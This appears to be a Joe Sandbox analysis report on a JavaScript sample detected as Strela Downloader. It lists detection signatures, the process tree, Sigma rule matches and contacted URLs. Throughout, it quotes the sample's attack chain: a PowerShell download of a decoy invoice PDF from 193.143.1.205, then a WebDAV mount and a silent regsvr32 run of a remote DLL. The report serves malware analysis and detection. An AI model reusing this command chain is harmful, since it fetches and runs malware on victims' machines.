Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2165116371124411090.js

Overview

General Information

Sample name:2165116371124411090.js
Analysis ID:1589905
MD5:9a4c27bf1fe77e727e56f8c11090b765
SHA1:fba4eb481833c1bab7864de82a0de26edae49c06
SHA256:91493ab08127d1bffcff02e61f80745c213ee2ba9d117b6f0154d77d27c5c964
Tags:jsuser-lowmal3
Infos:

Detection

Strela Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Sigma detected: Powershell launch regsvr32
Yara detected Strela Downloader
Gathers information about network shares
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host checks user region and language preferences
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 5936 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5932 cmdline: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5024 cmdline: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • Acrobat.exe (PID: 2168 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 3352 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 5916 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1744,i,18161430030709773635,14504383451938275129,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • cmd.exe (PID: 3840 cmdline: cmd /c net use \\193.143.1.205@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 3412 cmdline: net use \\193.143.1.205@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • svchost.exe (PID: 2224 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 5936JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 5024, ProcessName: powershell.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 5024, ProcessName: powershell.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", ProcessId: 5936, ProcessName: wscript.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5936, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ProcessId: 5932, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Hieu Tran: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5936, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ProcessId: 5932, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5936, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ProcessId: 5932, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5936, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ProcessId: 5932, ProcessName: cmd.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 5024, ProcessName: powershell.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5936, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ProcessId: 5932, ProcessName: cmd.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", ProcessId: 5936, ProcessName: wscript.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5932, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 5024, ProcessName: powershell.exe
    Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3840, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 3412, ProcessName: net.exe
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2224, ProcessName: svchost.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3840, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 3412, ProcessName: net.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5936, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll, ProcessId: 5932, ProcessName: cmd.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Software Vulnerabilities

    barindex
    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: Joe Sandbox ViewIP Address: 193.143.1.205 193.143.1.205
    Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
    Source: wscript.exe, 00000000.00000002.2215820612.000001B016010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205/invoice.php
    Source: net.exe, 00000007.00000002.2333983828.0000012D8E1EA000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2333983828.0000012D8E198000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2333983828.0000012D8E1CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/
    Source: net.exe, 00000007.00000002.2333983828.0000012D8E198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.205:8888/s
    Source: svchost.exe, 00000009.00000002.3503554480.000001D2FCC85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: 2D85F72862B55C4EADD9E66E06947F3D.8.drString found in binary or memory: http://x1.i.lencr.org/
    Source: qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
    Source: svchost.exe, 00000009.00000003.2335785912.000001D2FCA50000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5936, type: MEMORYSTR

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
    Source: 2165116371124411090.jsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal100.rans.spyw.expl.evad.winJS@27/45@0/2
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x1agva45.fee.ps1Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2165116371124411090.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\143671108429535.dll
